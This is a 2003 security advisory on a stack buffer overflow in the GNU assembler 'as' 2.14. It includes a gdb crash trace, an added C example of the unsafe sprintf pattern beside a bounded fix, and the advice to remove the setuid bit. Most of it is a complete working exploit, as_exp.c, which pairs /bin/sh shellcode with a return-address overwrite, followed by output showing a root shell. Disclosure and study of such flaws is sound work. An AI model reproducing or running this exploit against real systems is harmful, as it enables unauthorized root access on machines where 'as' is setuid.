
01 - Stack Buffer Overflow on GNU (assembler) 2.14 and previous, for Linux


No System Group - Advisory #01 - 19/08/03

DESCRIPTION

The GNU Binutils are a collection of binary tools.

'as' is the GNU assembler.

More information at: http://sources.redhat.com/binutils/

DETAILS

$ /usr/bin/as `perl -e 'print "A" x 2005'` 
Segmentation fault

Now we proceed to open gdb to view what may have occurred.

$gdb /usr/bin/as 
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA...
..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
esp 0xbffff090 0xbffff090
(gdb)

As the register dump shows, both the saved frame pointer (ebp) and the return address (eip) have been overwritten with our input, 0x41414141, so the over-long argument controls where execution continues. The stack pointer at the crash is the base the exploit below uses for its return address.
Return: 0xbffff090.
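The defect class behind the crash, as an added illustration that is not binutils code: a fixed-size stack buffer receives the command-line file name without a bound, beside the bounded form that removes the overflow. The message text is taken from the "can't open ... for reading" output above; the buffer size, the function names and the assumption that the message was built on the stack are constructed for this example, since the advisory does not name the affected function.

```c
/* Added example (not binutils code): the bug class behind this advisory.
 * Assumption: 'as' built its "can't open ... for reading" message from the
 * command-line file name into a fixed-size stack buffer; the exact binutils
 * function is not named in the advisory, so this is a constructed stand-in. */
#include <stdio.h>
#include <string.h>

#define MSG_BUF 256   /* constructed size for the fixed stack buffer */

/* Unsafe pattern: sprintf does not know the size of 'msg', so a file name
 * longer than the buffer overwrites the saved frame pointer and return
 * address on the stack, which is what the 0x41414141 in ebp/eip above shows.
 * Kept only to show the shape of the defect; never call it with untrusted input. */
void report_open_error_unsafe(const char *path)
{
    char msg[MSG_BUF];
    sprintf(msg, "can't open %s for reading", path);
    fputs(msg, stderr);
}

/* Hardened form: the caller supplies the buffer and its size, snprintf never
 * writes past it, and the return value tells the caller whether the message
 * was truncated (1), complete (0), or could not be formatted (-1). */
int report_open_error_safe(const char *path, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "can't open %s for reading", path);
    if (n < 0)
        return -1;
    return (size_t)n >= outlen ? 1 : 0;
}

/* Length gate as an alternative: reject the name before any copy happens.
 * Returns 1 when the whole message for 'path' fits in buflen bytes, else 0. */
int name_fits(const char *path, size_t buflen)
{
    /* the fixed parts of the message plus the terminating NUL must fit too */
    size_t fixed = strlen("can't open ") + strlen(" for reading") + 1;
    size_t len = strlen(path);
    return len < buflen && len + fixed <= buflen;
}

int main(void)
{
    char msg[MSG_BUF];
    char longname[2006];                 /* the 2005-byte argument from DETAILS */
    memset(longname, 'A', 2005);
    longname[2005] = '\0';
    int rc = report_open_error_safe(longname, msg, sizeof msg);
    printf("fits=%d truncated=%d msg=%.40s...\n", name_fits(longname, MSG_BUF), rc, msg);
    return 0;
}
```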

EXPLOIT

I have done minimal testing on this.

It has been tested on Slackware 9.0 and Red Hat 7.2.

------------------- as_exp.c -------------------- 
/* Linux 'as' buffer overflow

This will give you a root shell if /usr/bin/as is SUID,
which isn't by default.

Use: ./as_exp [offset]

Try offsets 300-400
Tested on Slackware 9.0 and Red Hat 7.2

by CoKi <coki@interlap.com.ar>
No System Group - http://www.nosystem.com.ar
*/


#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>   /* memcpy, strlen */
#include <unistd.h>   /* execlp */

#define OFFSET 350
#define BUFSIZE 2005  /* argument length that crashes 'as' (see DETAILS) */

long esp(void);

int main(int argc, char *argv[]) {

    char buf[BUFSIZE + 1];   /* +1 for the terminating NUL, so execlp sees a proper string */
    char shellcode[]=
    "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
    "\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int i, off;
    long ret;

    if(argc>1)
        off = atoi(argv[1]);
    else
        off = OFFSET;

    /* guessed return address: the current stack pointer minus an offset */
    ret = (esp() - off);
    printf("\n'as' buffer overflow by CoKi\n");
    printf("----------------------------\n\n");
    printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);

    /* fill the argument with NOPs (a sled) so an imprecise guess still lands in it */
    for(i=0;i+4<=BUFSIZE;i+=4)
        *(unsigned long *)&buf[i]=0x90909090;

    /* the last two dwords land on the saved frame pointer and the return address */
    *(unsigned long *)&buf[BUFSIZE - 4]=ret;
    *(unsigned long *)&buf[BUFSIZE - 8]=ret;

    /* shellcode sits just below the two address words */
    memcpy(buf + BUFSIZE - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    buf[BUFSIZE] = '\0';

    execlp("/usr/bin/as","as",buf,(char *)NULL);
    perror("execlp");   /* only reached if the exec itself failed */
    return 1;
}

/* returns the current stack pointer; relies on %eax carrying the return value
 * (32-bit x86, compiled without optimisation, as in the original) */
long esp(void){
    __asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------

$ gcc -o as_exp as_exp.c
$ ./as_exp 390

'as' buffer overflow by CoKi
----------------------------

Return Address: 0xbffff002
Offset: 390

Assembler messages:

Error: can't open ............ 
.................../bin/sh ..... for reading

sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#

This will give you a root shell if /usr/bin/as is SUID, which isn't by default.

SOLUTIONS

Remove the setuid bit from the program if it has one:

#chmod u-s /usr/bin/as


REFERENCES

http://www.nosystem.com.ar/advisories/advisory-01.txt

CREDITS

Discovered by CoKi <coki@interlap.com.ar>

No System Group - http://www.nosystem.com.ar
